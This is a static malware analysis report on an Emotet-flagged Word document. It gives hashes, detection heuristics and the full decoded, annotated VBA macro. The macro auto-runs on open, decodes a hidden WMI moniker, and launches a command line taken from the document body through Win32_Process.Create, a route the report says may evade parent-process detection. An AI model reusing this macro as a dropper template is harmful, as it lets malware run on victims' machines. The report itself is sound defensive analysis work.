Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9c3fad8742ccb86f…

MALICIOUS

Office (OLE)

155.5 KB Created: 2020-12-28 15:43:00 Authoring application: Microsoft Office Word First seen: 2022-06-20
MD5: 9bd0ed586a1443d1f265b5cd3628591a SHA-1: 133be627d479510047ab18e5acf59f636833369b SHA-256: 9c3fad8742ccb86fa0f3f1499d18bbc5da9d943a3d2abfc4b635addb9f7bd4e6
212 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.EmotetRed02224-9938637-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.EmotetRed02224-9938637-0
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call whose argument is built at runtime: Y0a4w407oz7qtipr40 is assembled from five string fragments with the "]b2[s" filler token stripped (see the extracted macro below) and resolves to the WMI moniker "winmgmts:win32_process"; the returned object is then used to call Win32_Process.Create with a command line taken from the document's body text.
    Matched line in script
    Set B09b4fx3xjl = CreateObject(Y0a4w407oz7qtipr40)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro — the auto-execution entry point; its only statement calls Tvy76yw4gd8b2rddw, where the process-creation logic lives.
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace identifier, not a download or C2 location; do not treat it as an indicator of compromise.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6009 bytes
SHA-256: a004a96685dc375590aeec65acf06fce9e74ef2bbe0aa7a48bc315f9645e3700
Detection
ClamAV: No threats found (the EmotetRed signature above fired on the parent OLE container, not on the decoded VBA text; a clean result on the extracted source alone does not mean the macro is benign)
Obfuscation or payload: likely
95 of 152 identifiers look randomly generated (e.g. 'Tvy76yw4gd8b2rddw') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "F97kcfud4sg48a534"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' ThisDocument module (VB_Base "1Normal.ThisDocument") under an obfuscated
' module name. Word runs Document_open automatically when the document is
' opened with macros enabled; the handler contains no logic of its own and
' simply calls the obfuscated entry function Tvy76yw4gd8b2rddw defined in
' module Kirhfozhuqmuq9mqa3, which is where process creation happens.
' Other code refers to this module as F97kcfud4sg48a534 to reach the
' document's StoryRanges (the lure's body text).
Private Sub Document_open()
Tvy76yw4gd8b2rddw
End Sub

Attribute VB_Name = "A1uiwgoqtxboz"
   

Attribute VB_Name = "Kirhfozhuqmuq9mqa3"
Function Tvy76yw4gd8b2rddw()
' Main payload routine, reached from Document_open.
' What the executed path does:
'   1. reads the document's body text (StoryRanges.Item(1)),
'   2. builds the WMI moniker "winmgmts:win32_process" from obfuscated
'      string fragments (the "]b2[s" filler is stripped by Re7jy2bpl6ys4),
'   3. CreateObject()s that moniker,
'   4. drops the first four characters of the body text, strips the same
'      filler from it, and passes the result to Win32_Process.Create as a
'      command line.
' Every "GoTo <label>" below jumps over a block that opens a file under
' A:\ and reads it into a Byte array. None of those blocks is ever
' executed (they also reference the undeclared variable fileInt); they are
' padding/junk inserted to obscure the real control flow. Each such block
' is marked "dead code" below.
' No variables are declared; with On Error Resume Next, any failure is
' silently skipped rather than surfaced.
On Error Resume Next
' F97kcfud4sg48a534 is the ThisDocument module. 234 / 234 = 1, so this is
' StoryRanges.Item(1) — the main document text in Word's object model.
' Assigned without Set, so the Range's default member (its text) is stored
' rather than the Range object. The real command line lives in that text;
' this report does not show the lure body, so the exact command is not
' recoverable from the macro alone.
Ub2TJdf = F97kcfud4sg48a534.StoryRanges.Item(234 / 234)
   GoTo uffaH
' dead code (skipped by the GoTo above)
Dim tRXHAGE() As Byte
Dim igvwzqHEI As Integer: igvwzqHEI = FreeFile
Open "A:\SuYTDHg\xdTxB\imsnzY.zHOXJJjD" For Binary Access Read As #igvwzqHEI
ReDim tRXHAGE(0 To LOF(fileInt) - 1)
Get #igvwzqHEI, , tRXHAGE
Close #igvwzqHEI
uffaH:
' Obfuscated fragments. With the "]b2[s" filler removed they read
' "p" and "rocess" respectively.
nUVh2dhs = "]b2[sp]b2[s"
N4asmzfhynfrf = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
   GoTo rJKwWHQ
' dead code (skipped by the GoTo above)
Dim TcNGAJFB() As Byte
Dim JjfqDDi As Integer: JjfqDDi = FreeFile
Open "A:\xXhTN\ptkWlU\zIkGdx.ucWXIRxyS" For Binary Access Read As #JjfqDDi
ReDim TcNGAJFB(0 To LOF(fileInt) - 1)
Get #JjfqDDi, , TcNGAJFB
Close #JjfqDDi
rJKwWHQ:
' Filler removed: ":win32_"
Bogtt5j4zeh0 = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
   GoTo igkYyc
' dead code (skipped by the GoTo above)
Dim xlrNt() As Byte
Dim OdBHsD As Integer: OdBHsD = FreeFile
Open "A:\HYyHBcJ\anHJkRNl\LVCOHCD.UQukWxbHE" For Binary Access Read As #OdBHsD
ReDim xlrNt(0 To LOF(fileInt) - 1)
Get #OdBHsD, , xlrNt
Close #OdBHsD
igkYyc:
' Filler removed: "winmgmt"
Iy9_or3fqinzg1v = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
   GoTo gUxGAam
' dead code (skipped by the GoTo above)
Dim rQjizZWl() As Byte
Dim tpZhGESS As Integer: tpZhGESS = FreeFile
Open "A:\CmcKeDAL\wwVUNn\zcWKCF.OCXGRIsJ" For Binary Access Read As #tpZhGESS
ReDim rQjizZWl(0 To LOF(fileInt) - 1)
Get #tpZhGESS, , rQjizZWl
Close #tpZhGESS
gUxGAam:
' Filler removed: "s"
Xfi3k_70uo8io = "]b2[ss]b2[s"
   GoTo SINMGDFYf
' dead code (skipped by the GoTo above)
Dim jTUNav() As Byte
Dim eKxiG As Integer: eKxiG = FreeFile
Open "A:\gbIFAoiU\rLfyICF\aIdIfIIIE.wDEMbA" For Binary Access Read As #eKxiG
ReDim jTUNav(0 To LOF(fileInt) - 1)
Get #eKxiG, , jTUNav
Close #eKxiG
SINMGDFYf:
' Concatenation order is "winmgmt" + "s" + ":win32_" + "p" + "rocess",
' i.e. "winmgmts:win32_process" once the filler token is stripped.
' The fragments are assembled out of source order so that no single
' string literal contains a recognisable keyword.
Ut53xy_8s86f0ce70 = Iy9_or3fqinzg1v + Xfi3k_70uo8io + Bogtt5j4zeh0 + nUVh2dhs + N4asmzfhynfrf
   GoTo XeRwJAF
' dead code (skipped by the GoTo above)
Dim ZoDTHDpD() As Byte
Dim WXUhUCgH As Integer: WXUhUCgH = FreeFile
Open "A:\JbhUI\opYHGZe\yswxDDr.xudxCCCKO" For Binary Access Read As #WXUhUCgH
ReDim ZoDTHDpD(0 To LOF(fileInt) - 1)
Get #WXUhUCgH, , ZoDTHDpD
Close #WXUhUCgH
XeRwJAF:
' Re7jy2bpl6ys4 -> Jfuohfyb720 -> Replace(..., "]b2[s", <Empty>) strips the
' filler, yielding the WMI moniker "winmgmts:win32_process".
Y0a4w407oz7qtipr40 = Re7jy2bpl6ys4(Ut53xy_8s86f0ce70)
   GoTo ZgySDD
' dead code (skipped by the GoTo above)
Dim ejZxpcag() As Byte
Dim yUhNrFGfH As Integer: yUhNrFGfH = FreeFile
Open "A:\YmOsGC\fHJgEls\YNSjJDcIz.rVcYJ" For Binary Access Read As #yUhNrFGfH
ReDim ejZxpcag(0 To LOF(fileInt) - 1)
Get #yUhNrFGfH, , ejZxpcag
Close #yUhNrFGfH
ZgySDD:
' Equivalent to CreateObject("winmgmts:win32_process"): binds to the WMI
' Win32_Process class via the moniker so that no literal "winmgmts" or
' "Win32_Process" string appears in the macro source.
Set B09b4fx3xjl = CreateObject(Y0a4w407oz7qtipr40)
   GoTo LommDqt
' dead code (skipped by the GoTo above)
Dim beYDQ() As Byte
Dim wmcmIAAeG As Integer: wmcmIAAeG = FreeFile
Open "A:\SXFfFD\wFgHLfJD\kWZaQAJFB.FPsnCAyEk" For Binary Access Read As #wmcmIAAeG
ReDim beYDQ(0 To LOF(fileInt) - 1)
Get #wmcmIAAeG, , beYDQ
Close #wmcmIAAeG
LommDqt:
' Mid(text, 5, Len(text)) discards the first four characters of the body
' text and keeps everything after them (a length beyond the end just
' returns the remainder). The skipped prefix is presumably a marker placed
' in the lure text — not verifiable here, as the body is not shown.
Spr_t8p3579ctofl = Mid(Ub2TJdf, (5), Len(Ub2TJdf))
   GoTo ADIOIBSQm
' dead code (skipped by the GoTo above)
Dim toctIBxH() As Byte
Dim uIRgZBFM As Integer: uIRgZBFM = FreeFile
Open "A:\XVSnB\TgDGKuoOg\TAJrPsTE.QvOhFEC" For Binary Access Read As #uIRgZBFM
ReDim toctIBxH(0 To LOF(fileInt) - 1)
Get #uIRgZBFM, , toctIBxH
Close #uIRgZBFM
ADIOIBSQm:
   GoTo InZbVBDA
' dead code (skipped by the GoTo above)
Dim TsKUGG() As Byte
Dim DzmwDB As Integer: DzmwDB = FreeFile
Open "A:\ezCoJQGd\TDdzbIKCJ\JpyXwwEp.tlUXXD" For Binary Access Read As #DzmwDB
ReDim TsKUGG(0 To LOF(fileInt) - 1)
Get #DzmwDB, , TsKUGG
Close #DzmwDB
InZbVBDA:
' Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation).
' CommandLine is the body text (minus its 4-char prefix) with the "]b2[s"
' filler stripped — the same de-obfuscation used for the moniker, so the
' lure text presumably carries the same filler. Ezou6ysmtlk6oeuq3 and
' Jqinu9zxo4pa are never assigned anywhere in the visible source, so the
' second and third arguments are passed as Empty.
' NOTE(review): creating the process through WMI rather than Shell() means
' the child is typically parented by the WMI provider host rather than
' WINWORD.EXE; detection logic keyed on "Word spawns cmd/powershell" may
' not see this chain — confirm with dynamic analysis.
B09b4fx3xjl.Create Re7jy2bpl6ys4(Spr_t8p3579ctofl), Ezou6ysmtlk6oeuq3, Jqinu9zxo4pa
   GoTo RHIiB
' dead code (skipped by the GoTo above)
Dim nKbAHAHCC() As Byte
Dim YkdJFEE As Integer: YkdJFEE = FreeFile
Open "A:\snZdINEp\IVZpADCF\cnFbjhE.kVmnE" For Binary Access Read As #YkdJFEE
ReDim nKbAHAHCC(0 To LOF(fileInt) - 1)
Get #YkdJFEE, , nKbAHAHCC
Close #YkdJFEE
RHIiB:
   GoTo DbULP
' dead code (skipped by the GoTo above)
Dim bxQpA() As Byte
Dim sewPJDEv As Integer: sewPJDEv = FreeFile
Open "A:\dtVDTCJqB\jXdwGDQE\JMmBBEIk.KGvBEH" For Binary Access Read As #sewPJDEv
ReDim bxQpA(0 To LOF(fileInt) - 1)
Get #sewPJDEv, , bxQpA
Close #sewPJDEv
DbULP:
End Function
Function Re7jy2bpl6ys4(Vmaypkm4efknkrner)
' De-obfuscation wrapper: returns Jfuohfyb720(Vmaypkm4efknkrner), i.e. the
' input with every "]b2[s" filler token removed. The extra layer adds no
' behaviour; it exists to lengthen the call chain. As in the caller, each
' "GoTo <label>" skips a never-executed block that would open a file under
' A:\ (dead code referencing the undeclared fileInt).
' Called twice by Tvy76yw4gd8b2rddw: once to recover the WMI moniker and
' once to recover the command line from the document body text.
On Error Resume Next
   GoTo jgmms
' dead code (skipped by the GoTo above)
Dim lfeCNHGR() As Byte
Dim WeqiF As Integer: WeqiF = FreeFile
Open "A:\PQWMx\oCIcg\WZuLJJzpH.LorhI" For Binary Access Read As #WeqiF
ReDim lfeCNHGR(0 To LOF(fileInt) - 1)
Get #WeqiF, , lfeCNHGR
Close #WeqiF
jgmms:
' Plain copy of the argument; the parentheses do nothing.
Y4hj47bty9n82 = (Vmaypkm4efknkrner)
   GoTo TkEbdD
' dead code (skipped by the GoTo above)
Dim QetqAJT() As Byte
Dim FAgCCBV As Integer: FAgCCBV = FreeFile
Open "A:\QjvjJDD\oisAG\kAeGYYnyY.SZmjJJID" For Binary Access Read As #FAgCCBV
ReDim QetqAJT(0 To LOF(fileInt) - 1)
Get #FAgCCBV, , QetqAJT
Close #FAgCCBV
TkEbdD:
' The only real work: strip the filler token.
I78o0glkxzrqvr = Jfuohfyb720(Y4hj47bty9n82)
   GoTo LnkcA
' dead code (skipped by the GoTo above)
Dim stUGJCp() As Byte
Dim MAqBA As Integer: MAqBA = FreeFile
Open "A:\OKMXFfICG\hWUDHDTl\oCpryZk.LjyLA" For Binary Access Read As #MAqBA
ReDim stUGJCp(0 To LOF(fileInt) - 1)
Get #MAqBA, , stUGJCp
Close #MAqBA
LnkcA:
Re7jy2bpl6ys4 = I78o0glkxzrqvr
   GoTo NggPWDAI
' dead code (skipped by the GoTo above)
Dim HfplveoKI() As Byte
Dim fKgWeFJEc As Integer: fKgWeFJEc = FreeFile
Open "A:\OhVDJH\ZoQWEY\QvTGBDJS.sELpHVHE" For Binary Access Read As #fKgWeFJEc
ReDim HfplveoKI(0 To LOF(fileInt) - 1)
Get #fKgWeFJEc, , HfplveoKI
Close #fKgWeFJEc
NggPWDAI:
End Function
Function Jfuohfyb720(Okg2cnd7zl2)
' Core de-obfuscation primitive: removes every occurrence of the filler
' token "]b2[s" from Okg2cnd7zl2 and returns the result.
' Blftrpn467zn6 (the replacement) is never assigned anywhere in the visible
' source, so it is Empty and Replace() treats it as "" — the token is
' deleted rather than substituted. Knowing this token is enough to decode
' both the WMI moniker and the command line hidden in the document body.
' Unlike the other two functions this one has no On Error Resume Next.
' The assignment below is a no-op between two undeclared variables.
N2yzp8_zqfaiu185 = Dftx1th8lf2agu
   GoTo akwzBMGS
' dead code (skipped by the GoTo above; references undeclared fileInt)
Dim PbmVIx() As Byte
Dim DlDGC As Integer: DlDGC = FreeFile
Open "A:\TTrcDU\JdkyAAHeJ\twsvHDoCH.ZQCUkj" For Binary Access Read As #DlDGC
ReDim PbmVIx(0 To LOF(fileInt) - 1)
Get #DlDGC, , PbmVIx
Close #DlDGC
akwzBMGS:
' Strip the filler token; this is the function's only effective statement.
Jfuohfyb720 = Replace(Okg2cnd7zl2, "]b2[s", Blftrpn467zn6)
   GoTo DYWPGZ
' dead code (skipped by the GoTo above)
Dim zjzWCpeIL() As Byte
Dim lSlPokuI As Integer: lSlPokuI = FreeFile
Open "A:\ikYzbIDGo\cBZyCD\UQaTFC.wEVjCF" For Binary Access Read As #lSlPokuI
ReDim zjzWCpeIL(0 To LOF(fileInt) - 1)
Get #lSlPokuI, , zjzWCpeIL
Close #lSlPokuI
DYWPGZ:
End Function